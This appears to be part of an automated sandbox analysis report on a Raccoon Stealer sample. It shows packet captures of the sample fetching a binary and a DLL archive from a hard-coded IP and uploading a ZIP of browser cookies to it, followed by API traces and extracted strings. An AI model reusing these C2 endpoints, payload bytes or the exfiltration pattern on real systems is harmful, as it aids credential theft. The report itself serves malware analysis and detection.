Jul 22, 2021 11:28:00.648653984 CEST	1132	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 22 Jul 2021 09:28:00 GMT Content-Type: application/octet-stream Content-Length: 916735 Connection: keep-alive Last-Modified: Sat, 10 Jul 2021 15:08:06 GMT ETag: "60e9b7d6-dfcff" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 17 19 74 5c 00 10 0c 00 12 10 00 00 e0 00 06 21 0b 01 02 19 00 5a 09 00 00 04 0b 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 70 09 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 b0 0c 00 00 06 00 00 1c 87 0e 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 c0 0a 00 9d 20 00 00 00 f0 0a 00 48 0c 00 00 00 20 0b 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 0b 00 bc 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 0b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 f1 0a 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 58 58 09 00 00 10 00 00 00 5a 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 fc 1b 00 00 00 70 09 00 00 1c 00 00 00 60 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 14 1f 01 00 00 90 09 00 00 20 01 00 00 7c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 b0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 9d 20 00 00 00 c0 0a 00 00 22 00 00 00 9c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 48 0c 00 00 00 f0 0a 00 00 0e 00 00 00 be 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 00 0b 00 00 02 00 00 00 cc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 10 0b 00 00 02 00 00 00 ce 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 20 0b 00 00 06 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 bc 33 00 00 00 30 0b 00 00 34 00 00 00 d6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 d8 02 00 00 00 70 0b 00 00 04 00 00 00 0a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 d8 98 00 00 00 80 0b 00 00 9a 00 00 00 0e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 f5 1a 00 00 00 20 0c 00 00 1c 00 00 00 a8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 80 1a 00 00 00 40 0c 00 00 1c 00 00 00 c4 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 35 37 00 00 00 00 00 bc 08 00 00 00 60 0c 00 00 0a 00 00 00 e0 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 37 30 00 00 00 00 00 69 02 00 00 00 70 0c 00 00 04 00 00 00 ea 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 d3 1c 00 00 00 80 0c 00 00 1e 00 00 00 ee 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 90 02 00 00 00 a0 0c 00 00 04 00 00 00 0c 0c 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELt\!Zpa H 03.textXXZ`P`.datap`@`.rdata \|@`@.bss(`.edata "@0@.idataH@0.CRT,@0.tls @0.rsrc @0.reloc304@0B/4p@@B/19@B/31 @B/45@@B/57`@0B/70ip@B/81@B/92
Jul 22, 2021 11:28:00.648706913 CEST	1133	IN	Data Raw: 00 00 00 00 00 40 00 10 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: @B
Jul 22, 2021 11:28:00.648749113 CEST	1135	IN	Data Raw: e8 42 1c 09 00 83 ec 0c 85 c0 89 c5 0f 85 5a ff ff ff 89 7c 24 08 c7 44 24 04 00 00 00 00 89 34 24 e8 21 1c 09 00 83 ec 0c 89 7c 24 08 c7 44 24 04 00 00 00 00 89 34 24 e8 fa 1b 09 00 83 ec 0c 89 7c 24 08 c7 44 24 04 00 00 00 00 89 34 24 e8 73 fc Data Ascii: BZ\|$D$4$!\|$D$4$\|$D$4$s\|$D$4$'aT$$tL$(D$ M&T$T$U=at9$a`aQtD$
Jul 22, 2021 11:28:00.648782969 CEST	1135	IN	Data Raw: 04 24 ff d2 c9 c3 31 c0 c3 55 31 c0 ba 01 00 00 00 89 e5 83 ec 10 dd 45 08 dd 5d f0 dd 45 f0 dd 5d f8 dd 45 f0 dd 45 f8 c9 df e9 dd d8 0f 9a c0 0f 45 c2 c3 85 c0 74 4d 0f b6 08 80 b9 60 a4 ea 61 00 89 ca 79 3f 55 Data Ascii: $1U1E]E]EEEtM`ay?U
Jul 22, 2021 11:28:00.648822069 CEST	1136	IN	Data Raw: 80 f9 5b b1 5d 0f 44 d1 b9 01 00 00 00 89 e5 57 56 53 be 01 00 00 00 8a 1c 08 8d 7e ff 38 da 75 0d 3a 54 08 01 75 0f 88 54 30 ff 41 eb 04 88 5c 30 ff 41 46 eb e1 5b c6 04 38 00 5e 5f 5d c3 55 89 e5 57 56 89 c6 53 31 db 0f b6 0c 1e 0f b6 3c 1a 89 Data Ascii: []DWVS~8u:TuT0A\0AF[8^_]UWVS1<`a`a)uCu[^_]UEUu1t]]UWVMSU}u1KtBOG1x4`a`a)t2`
Jul 22, 2021 11:28:00.648864031 CEST	1138	IN	Data Raw: 01 76 54 b9 28 00 00 00 83 e9 0a 01 c0 11 d2 83 fa 00 77 34 83 f8 07 76 ef eb 2d 3d ff 00 00 00 76 1f 0f ac d0 04 83 c1 28 c1 ea 04 83 fa 00 77 f1 eb e8 83 f8 0f 76 10 0f ac d0 01 83 c1 0a d1 ea 83 fa 00 77 f2 eb eb 83 e0 07 66 8b 84 00 ec 2f ea Data Ascii: vT(w4v-=v(wvwf/aL]t+UVSX94uDL0911[^]U1@Ht`aiy7]UWVSSXtM1M6X0Xp1tC
Jul 22, 2021 11:28:00.648904085 CEST	1139	IN	Data Raw: 30 5b 5d c3 8b 48 18 8b 50 1c 55 89 4a 18 8b 48 18 89 e5 89 51 1c 8b 50 14 c7 40 18 00 00 00 00 ff 4a 2c 5d c3 55 89 e5 8b 45 08 5d 8b 40 30 c3 55 31 d2 89 e5 57 56 8b 4d 08 53 8b 45 10 8b 75 0c 8b 5d 14 8b 79 34 f7 f7 8b 41 38 8d 04 90 8b 10 39 Data Ascii: 0[]HPUJHQP@J,]UE]@0U1WVMSEu]y4A89tBV1A8;Y$^V0vY$[^_]UWVSM2xur9-\|;]w&9\|;]sA@tQQZuBE[^_]UVS@
Jul 22, 2021 11:28:00.648945093 CEST	1139	IN	Data Raw: c7 3b 46 4c 74 0b f6 46 16 40 b8 06 01 00 00 75 31 8b 5e 48 85 db 74 28 3b 3b 74 1f 39 53 04 75 1a 8a 45 f3 38 43 08 74 12 80 f9 02 b8 06 01 00 00 75 0f 66 81 4e 16 80 00 eb 07 8b 5b 0c eb d4 31 c0 5a 5b 5e 5f 5d c3 80 78 44 00 78 32 55 89 e5 56 Data Ascii: ;FLtF@u1^Ht(;;t9SuE8CtufN[1Z[^_]xDx2UV
Jul 22, 2021 11:28:00.648991108 CEST	1141	IN	Data Raw: 31 f6 53 89 c3 0f be 43 44 39 c6 7d 0f 8b 44 b3 78 46 8b 40 48 e8 38 fd ff ff eb e9 8b 43 74 8b 40 48 e8 2b fd ff ff c6 43 44 ff 5b 5e 5d c3 83 fa 01 76 42 55 b9 05 00 00 00 89 e5 57 56 89 c6 53 8b 40 24 89 d3 31 d2 f7 f1 31 d2 8d 78 01 8d 43 fe Data Ascii: 1SCD9}DxF@H8Ct@H+CD[^]vBUWVS@$11xC[1av ^_]PA9D1UWVS@US4Ez$A+E1CU9LfQQ+UfQ^_[^_]UWVS$EMEE8EU}v&
Jul 22, 2021 11:28:00.649033070 CEST	1142	IN	Data Raw: c3 55 89 c2 89 e5 83 ec 18 0f b6 52 0a 8b 48 0c 8b 40 10 c7 45 f8 00 00 00 00 c7 45 fc 00 00 00 00 89 14 24 8d 55 f8 e8 9f eb ff ff 8b 45 f8 8b 55 fc c9 c3 55 89 e5 57 56 53 89 c3 83 ec 24 dd 00 dd 14 24 dd 5d d8 e8 5e ff ff ff 89 45 e0 89 55 e4 Data Ascii: URH@EE$UEUUWVS$$]^EUmEz,u*rwCSf%>fC$[^_]UHt@Pt@ ;Pl1]HlU~kHhfQ]USy@lP<a{QukAh
Jul 22, 2021 11:28:00.728779078 CEST	1143	IN	Data Raw: c0 89 e5 8b 55 08 85 d2 74 08 83 7a 10 00 74 02 8b 02 5d c3 55 89 e5 57 56 53 89 d6 89 cb 8d 55 e0 8d 4d e4 89 c7 83 ec 4c c7 45 e0 00 00 00 00 c7 45 e4 00 00 00 00 8b 03 89 55 d0 89 4d d4 89 44 24 14 8d 43 08 89 44 24 10 8b 06 89 4c 24 04 89 3c Data Ascii: Utzt]UWVSUMLEEUMD$CD$L$<$D$FD$W MU2FVt^CSEtsEL[^_]USEXHEX1[]UE8uURP&1]UWVS1Mt<.t
Jul 22, 2021 11:28:03.861624956 CEST	2106	OUT	GET //l/f/t--ny3oBagrSXdgRr-eA/ae3c4e3333af17553eef71298da070dcf215425f HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: 94.228.114.197
Jul 22, 2021 11:28:04.201690912 CEST	2107	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 22 Jul 2021 09:28:04 GMT Content-Type: application/octet-stream Content-Length: 2828315 Connection: keep-alive Last-Modified: Sat, 10 Jul 2021 15:08:05 GMT ETag: "60e9b7d5-2b281b" Accept-Ranges: bytes Data Raw: 50 4b 03 04 14 00 00 00 08 00 9a 7a 6e 4e 3c 09 f8 7b 72 d2 00 00 d0 69 01 00 0b 00 00 00 6e 73 73 64 62 6d 33 2e 64 6c 6c ec fd 7f 7c 14 d5 d5 38 00 cf ee 4e 92 0d 59 d8 05 36 18 24 4a 90 a0 d1 a0 06 16 24 31 80 d9 84 dd 44 20 b0 61 c9 2e 11 13 b4 6a 4c b7 56 f9 b1 43 b0 12 08 4e 02 3b 19 b7 f5 e9 a3 7d ec 2f ab f5 f1 e9 0f db a7 b6 b5 80 d5 ea 86 d8 24 f8 13 81 5a 2c 54 a3 52 bd 71 63 8d 92 86 45 63 e6 3d e7 dc 99 dd 0d da ef f7 fb be 7f bf f0 c9 ec cc dc 3b f7 9e 7b ee b9 e7 9e 73 ee b9 e7 d6 de 70 bf 60 11 04 41 84 3f 4d 13 84 83 02 ff 57 21 fc df ff e5 99 04 61 ca ec 3f 4e 11 9e ca 7e 65 ce 41 d3 ea 57 e6 ac 6f f9 fa b6 82 cd 5b ef ba 7d eb cd df 2c b8 e5 e6 3b ef bc 2b 5c f0 b5 db 0a b6 4a 77 16 7c fd ce 82 15 6b fd 05 df bc eb d6 db ae 9a 3c 79 52 a1 5e c6 45 07 6f 18 6e 78 73 d1 63 c6 9f ef d1 9f 3d 56 0f bf ed cf 2c fe e9 46 f8 ed bb fb cc 63 75 f4 bc e4 a7 1b e8 77 c1 4f fd f4 5b f2 d3 75 f0 7b cf d3 3c df 77 ff b8 f8 a7 37 50 19 8b 1f 7b 91 9e 4b 7e ea a6 df 45 f4 dd 77 ff f8 d2 63 fc f7 1a 7a 5e f7 f5 5b 5a b0 be 7f d7 36 9f 47 10 56 9b 32 84 e7 2b ba 6e 34 de 0d 08 97 cc c9 31 4d c9 11 2e 84 86 97 f0 77 7b 66 c3 bd 03 6e 4a 4c f8 e8 a0 7b b3 20 64 0a f4 9c fc 15 da 4d 84 e4 2b b6 98 20 b9 82 7f e4 10 84 d4 2f ff 29 b8 ce 24 58 21 b5 08 b2 f4 e3 cb 9b 4c c2 0e 4b 1a 60 ab 4d c2 91 8b e0 77 b3 49 f8 ef 4c 41 38 72 ad 49 58 ff 7f e8 a3 a2 72 d3 c4 be 04 38 37 98 ff 7d fe ab c2 b7 ed 08 c3 ef e9 3c bd 5d 17 72 b8 d3 ff 15 00 54 57 6d bd f5 e6 f0 cd 82 b0 62 36 2f 13 5f 0a 17 9b d2 b3 61 bd 15 57 f1 6c 42 02 db e0 33 11 6e 84 e5 5f ca 17 bb 6a eb b6 ad b7 08 02 6f eb 4d 7a 9d 15 5f 51 de d6 db ee b8 eb 16 81 da 8e 38 10 ac f0 bb e2 4b f9 2a 85 ff ff bf ff a7 7f f5 ea 90 bc ac c8 67 72 08 e1 4c b9 cd 2a 48 2e b5 d6 76 b6 fb 8b 84 36 5b 2a 92 bf e9 34 49 97 a8 dd 7b de 31 67 09 c2 3c 1c 02 3e 4d ca d3 24 47 9d 26 59 d9 8b d0 f7 f2 0b ce c6 1e 2d f7 a1 12 93 a3 4f 98 01 39 5c b1 c6 1e 2c 74 c8 e1 57 1b 6d ae 58 20 a8 b6 59 d5 33 ea 2a 87 e2 19 53 3c 23 7d 1e 22 85 3e cf 30 52 42 67 2c 9c 1d b2 6c 68 2e 73 8b e1 6f d8 0f b8 c5 e6 72 cf 70 38 13 ae 09 29 bf cf 33 82 1d 4b 0f 76 fb 01 93 eb 64 73 d9 8d 6e 33 14 2b 5d 07 8f f6 03 2b dc e3 ae c3 ed 6b 72 4d 75 01 5f 90 59 5c 82 a0 0e cb 2f 38 54 cf 18 96 0b af 06 26 0b 42 43 83 22 8d 75 8e da 3b be 0f 65 a9 6b 20 75 24 1e 81 cf 15 8f cd 7e 60 bd 7b 1c 21 ab 4d c8 09 f3 ae 5c 57 ac 59 a9 33 37 2b 6e 51 f5 5a 95 2a ab ea b1 c5 33 5c 47 15 bf 35 64 be a1 f8 90 5a 9f 68 56 4c cd ea 5a 1b 7c 6b 89 35 17 f7 ab 58 46 ac 59 1e cc 6c 56 56 57 9a d5 43 98 d8 7c bd fd 80 80 cf 62 fb aa 5c 93 5a 0f 95 87 6d 81 20 f3 03 30 f0 d4 d0 50 fe 46 38 7b 5d 90 55 11 70 da da 52 57 2c 6e 91 fb b5 4d 4d 1b d5 7f e8 c8 73 aa 1e c2 5f 40 b5 aa 3e 51 dd 08 20 8e a8 b5 4e a5 3e 11 54 3f 57 4d ea 16 11 b1 29 39 42 d6 86 ce a3 f6 8e bf 00 9e ec 07 96 d8 0f 1c 6d 56 57 b4 9a 9b 8b bb ed 07 62 80 36 7b e5 11 7c 21 da 0f bc 08 ef d4 4f ec 07 12 01 4d 1a 89 8a e5 3e d6 3e c3 24 5c 2e 25 d4 d7 4c d2 88 7a 46 93 6c d0 a5 f6 03 33 9a 95 9d 01 b3 7c 08 b0 30 23 2a 4e 2b ee b7 1f 38 c4 9b e7 35 db 0f c0 ef 4e af e8 8a 55 34 2b 62 80 15 66 53 ff 03 32 3a 63 f6 8e 1f 03 7a e5 b6 04 c0 31 43 a9 1f 92 b6 da 0f 40 41 cd 9d 5a f8 26 b5 d6 a1 f6 95 77 6f 13 d5 d7 e2 16 fb 81 c3 00 52 40 04 Data Ascii: PKznN<{rinssdbm3.dll\|8NY6$J$1D a.jLVCN;}/$Z,TRqcEc=;{sp`A?MW!a?N~eAWo[},;+\Jw\|k<yR^Eonxsc=V,FcuwO[u{<w7P{K~Ewcz^[Z6GV2+n41M.w{fnJL{ dM+ /)$X!LK`MwILA8rIXr87}<]rTWmb6/_aWlB3n_joMz_Q8KgrLH.v6[4I{1g<>M$G&Y-O9\,tWmX Y3S<#}">0RBg,lh.sorp8)3Kvdsn3+]+krMu_Y\/8T&BC"u;ek u$~`{!M\WY37+nQZ3\G5dZhVLZ\|k5XFYlVVWC\|b\Zm 0PF8{]UpRW,nMMs_@>Q N>T?WM)9BmVWb6{\|!OM>>$\.%LzFl3\|0#N+85NU4+bfS2:cz1C@AZ&woR@
Jul 22, 2021 11:28:07.177747965 CEST	5057	OUT	POST / HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data, boundary=vD2tL1qC9bC3zV9eD9yX8dU8yY8lC1cV Content-Length: 1392 Host: 94.228.114.197
Jul 22, 2021 11:28:07.177972078 CEST	5058	OUT	Data Raw: 04 e5 19 0d 0a 2d 2d 76 44 32 74 4c 31 71 43 39 62 43 33 7a 56 39 65 44 39 79 58 38 64 55 38 79 59 38 6c 43 31 63 56 0d 0a 63 6f 6e 74 65 6e 74 2d 64 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 2d 2d Data Ascii: --vD2tL1qC9bC3zV9eD9yX8dU8yY8lC1cVcontent-disposition: form-data; name="t--ny3oBagrSXdgRr-eA"; filename="t--ny3oBagrSXdgRr-eA.zip"Content-Type: application/octet-streamPK[R_Z*browsers/cookies/Google Chrome_D
Jul 22, 2021 11:28:07.624876976 CEST	5059	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 22 Jul 2021 09:28:07 GMT Content-Type: text/plain;charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Access-Control-Allow-Headers: * Access-Control-Allow-Origin: * Data Raw: 32 38 0d 0a 62 36 37 61 35 63 39 63 31 38 35 65 66 36 38 36 35 37 31 34 61 35 66 62 38 63 30 33 65 34 62 61 66 66 65 30 32 33 30 35 0d 0a 30 0d 0a 0d 0a Data Ascii: 28b67a5c9c185ef6865714a5fb8c03e4baffe023050

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Jul 22, 2021 11:27:59.475930929 CEST	195.201.225.248	443	192.168.2.3	49718	CN=telecut.in CN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=US	CN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.	Fri Jun 18 11:07:36 CEST 2021 Fri Sep 04 02:00:00 CEST 2020 Wed Jan 20 20:14:03 CET 2021	Thu Sep 16 11:07:35 CEST 2021 Mon Sep 15 18:00:00 CEST 2025 Mon Sep 30 20:14:03 CEST 2024	771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0	ce5f3254611a8c095a3d821d44539877
					CN=R3, O=Let's Encrypt, C=US	CN=ISRG Root X1, O=Internet Security Research Group, C=US	Fri Sep 04 02:00:00 CEST 2020	Mon Sep 15 18:00:00 CEST 2025
					CN=ISRG Root X1, O=Internet Security Research Group, C=US	CN=DST Root CA X3, O=Digital Signature Trust Co.	Wed Jan 20 20:14:03 CET 2021	Mon Sep 30 20:14:03 CEST 2024

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

System Behavior

Analysis Process: KnZsSmDyF3.exe PID: 4712 Parent PID: 5764

General

Start time:	11:27:57
Start date:	22/07/2021
Path:	C:\Users\user\Desktop\KnZsSmDyF3.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\KnZsSmDyF3.exe'
Imagebase:	0x400000
File size:	506880 bytes
MD5 hash:	AA717550158FAF72A3776CE7115F80D3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Raccoon, Description: Yara detected Raccoon Stealer, Source: 00000001.00000003.200402548.0000000002770000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Raccoon, Description: Yara detected Raccoon Stealer, Source: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Raccoon, Description: Yara detected Raccoon Stealer, Source: 00000001.00000002.219929790.0000000002670000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: KnZsSmDyF3.exe PID: 4712 Parent PID: 5764 KnZsSmDyF3.exeCOMMON

Executed Functions

Function 0042982C, Relevance: 181.4, APIs: 48, Strings: 52, Instructions: 6353threadsleepsynchronizationCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00429831
CoInitialize.OLE32(00000000), ref: 0042984D

Part of subcall function 00432DFB: OpenMutexA.KERNEL32 ref: 00432E4C
Part of subcall function 00432DFB: CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 00432E59

CoUninitialize.OLE32(?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0042FBD5

Part of subcall function 00435B10: GetCurrentProcess.KERNEL32(00000008,?,?,?), ref: 00435B22
Part of subcall function 00435B10: OpenProcessToken.ADVAPI32(00000000), ref: 00435B29
Part of subcall function 00435B10: GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00435B43
Part of subcall function 00435B10: GetLastError.KERNEL32 ref: 00435B4D
Part of subcall function 00435B10: GlobalAlloc.KERNEL32(00000040,00000000), ref: 00435B5D
Part of subcall function 00435B10: GetTokenInformation.KERNELBASE(?,TokenIntegrityLevel,00000000,00000000,00000000), ref: 00435B71
Part of subcall function 00435B10: ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 00435B85
Part of subcall function 00435B10: GlobalFree.KERNEL32 ref: 00435BA5

GetUserDefaultLCID.KERNEL32(00001001,?,000000FF), ref: 00429891
GetLocaleInfoA.KERNEL32(00000000), ref: 00429898

Part of subcall function 00435BB5: __EH_prolog.LIBCMT ref: 00435BBA
Part of subcall function 00435BB5: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00435C1B
Part of subcall function 00435BB5: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00435C35
Part of subcall function 00435BB5: OpenProcess.KERNEL32(001FFFFF,00000000,?,?,?,00000000), ref: 00435CA9
Part of subcall function 00435BB5: OpenProcessToken.ADVAPI32(00000000,000F01FF,?,?,?,00000000), ref: 00435CBB
Part of subcall function 00435BB5: DuplicateTokenEx.ADVAPI32(?,000F01FF,00000000,00000002,00000001,?,?,?,00000000), ref: 00435CD6
Part of subcall function 00435BB5: CloseHandle.KERNEL32(?,?,?,00000000), ref: 00435CE3
Part of subcall function 00435BB5: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,00000000), ref: 00435CF6

Part of subcall function 004144A9: __EH_prolog.LIBCMT ref: 004144AE

Sleep.KERNEL32(00001388,004889F4,00000000,0047734B), ref: 00429E18

Part of subcall function 00412716: _Deallocate.LIBCONCRT ref: 00412725

Part of subcall function 00430F2B: __EH_prolog.LIBCMT ref: 00430F30
Part of subcall function 00430F2B: WinHttpOpen.WINHTTP(00000000,00000000,00000000,00000000,00000000,?,0047734B,00000000), ref: 00430F79
Part of subcall function 00430F2B: WinHttpConnect.WINHTTP(00000000,00000000,000001BB,00000000,?,?,?,?,0047734B,00000000), ref: 00431048

Part of subcall function 004124F9: _Deallocate.LIBCONCRT ref: 0041250E

Part of subcall function 004148A7: __EH_prolog.LIBCMT ref: 004148AC

GetUserNameA.ADVAPI32(?,00000101), ref: 00429FEF

Part of subcall function 0041466A: __EH_prolog.LIBCMT ref: 0041466F

Part of subcall function 00430F2B: WinHttpOpenRequest.WINHTTP(00000000,?,00000000,00000000,00000000,00000000,00800100,?,?,?,?,0047734B,00000000), ref: 0043111F
Part of subcall function 00430F2B: _strlen.LIBCMT ref: 004311BF
Part of subcall function 00430F2B: _strlen.LIBCMT ref: 004311C9
Part of subcall function 00430F2B: WinHttpSendRequest.WINHTTP(00000000,Content-Type: text/plain; charset=UTF-8,000000FF,?,00000000,00000000,00000000,?,?,?,0047734B,00000000), ref: 004311E0
Part of subcall function 00430F2B: WinHttpReceiveResponse.WINHTTP(00000000,00000000,?,?,?,0047734B,00000000), ref: 004311F2
Part of subcall function 00430F2B: WinHttpQueryDataAvailable.WINHTTP(00000000,?,?,?,?,0047734B,00000000), ref: 0043120A
Part of subcall function 00430F2B: WinHttpReadData.WINHTTP(00000000,00000000,?,?,?,?,?,?,?,?,0047734B,00000000), ref: 0043123F

_strlen.LIBCMT ref: 0042A2D1
_strlen.LIBCMT ref: 0042A2F3
CreateThread.KERNEL32 ref: 0042A53D
CreateThread.KERNEL32 ref: 0042A54F
CreateThread.KERNEL32 ref: 0042A561
CreateThread.KERNEL32 ref: 0042A573
CreateThread.KERNEL32 ref: 0042A585
CreateThread.KERNEL32 ref: 0042A597
CreateThread.KERNEL32 ref: 0042A5A9
CreateThread.KERNEL32 ref: 0042A5BB
CreateThread.KERNEL32 ref: 0042A5CD
CreateThread.KERNEL32 ref: 0042A5DF
CreateThread.KERNEL32 ref: 0042A5F1
CreateThread.KERNEL32 ref: 0042A829
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0042A832

Part of subcall function 00426C4E: __EH_prolog.LIBCMT ref: 00426C53

CreateThread.KERNEL32 ref: 0042A5FD

Part of subcall function 0042FD6E: __EH_prolog.LIBCMT ref: 0042FD73

Strings

,, xrefs: 0042D2B4
POST, xrefs: 0042A156
GET, xrefs: 00429DB9, 00429E39
I, xrefs: 0042AD39
>, xrefs: 0042AF76
a, xrefs: 0042BE16
[, xrefs: 0042DC4C
j, xrefs: 0042ECAB
ojURFai0NHYKsqWDmpwS7M4AVrTIH8Gqn8dRtUnLErUBD0tPiCUYPA== , xrefs: 00429B70
?, xrefs: 0042B9F2
A, xrefs: 0042D732
, xrefs: 0042FB2E
O, xrefs: 0042CA68
N, xrefs: 0042E39C
Q, xrefs: 0042F759
H, xrefs: 0042FA07
0, xrefs: 0042CD9D
25ef3d2ceb7c85368a843a6d0ff8291d , xrefs: 00429B83
w, xrefs: 0042A984, 0042AB01, 0042AD09, 0042AF46, 0042B132, 0042B2FB, 0042B374, 0042B46B, 0042B4DE, 0042B534, 0042C1C1, 0042C1D9, 0042C1F1, 0042C209, 0042C221, 0042C240, 0042D136, 0042D1C8, 0042D2A7, 0042DE09, 0042E027, 0042E041, 0042E618, 0042E75F, 0042E7F2, 0042E7FD, 0042E80C, 0042E837, 0042E983, 0042EB00, 0042EB9B, 0042EBB5, 0042EBE4, 0042EC93, 0042EDA6, 0042EF1D, 0042F00F, 0042F143, 0042F1CD, 0042F20D, 0042F556, 0042F7F2, 0042F7FD, 0042F80C, 0042F9B1, 0042FAAA, 0042FAB5, 0042FAC0, 0042FACB, 0042FAD6, 0042FAE1, 0042FAEC, 0042FAF7, 0042FB0D, 0042FB18, 0042FB23, 0042FB41, 0042FB4C, 0042FB57, 0042FB62, 0042FB78, 0042FB83, 0042FB8E, 0042FB99, 0042FBA4, 0042FBAF, 0042FBBA, 0042FBC5, 0042FBD0
z, xrefs: 0042B709
Q, xrefs: 0042B162
=, xrefs: 0042F685
I, xrefs: 0042D92D
q, xrefs: 0042B871
+, xrefs: 0042AB13
{, xrefs: 0042BB5D
|, xrefs: 0042C00C
\, xrefs: 0042B233
%, xrefs: 0042F248
J, xrefs: 0042AC0C
qSVdAbi/K2pP5PzejMhd4MMaCbbMW8a62JwUjkSA , xrefs: 00429B60
t, xrefs: 0042D3F4
_id, xrefs: 0042EC4B
<, xrefs: 0042F4B5
~, xrefs: 0042C40E
K, xrefs: 0042CF2D
H, xrefs: 0042F2CD
C, xrefs: 0042FA17
], xrefs: 00429FF7
&, xrefs: 0042F907
m, xrefs: 0042C6B5
`, xrefs: 0042F869
), xrefs: 0042BCC4
<, xrefs: 0042AA2A
., xrefs: 0042F5E9
2, xrefs: 0042EDB3
g, xrefs: 0042CC0C
\, xrefs: 0042C948
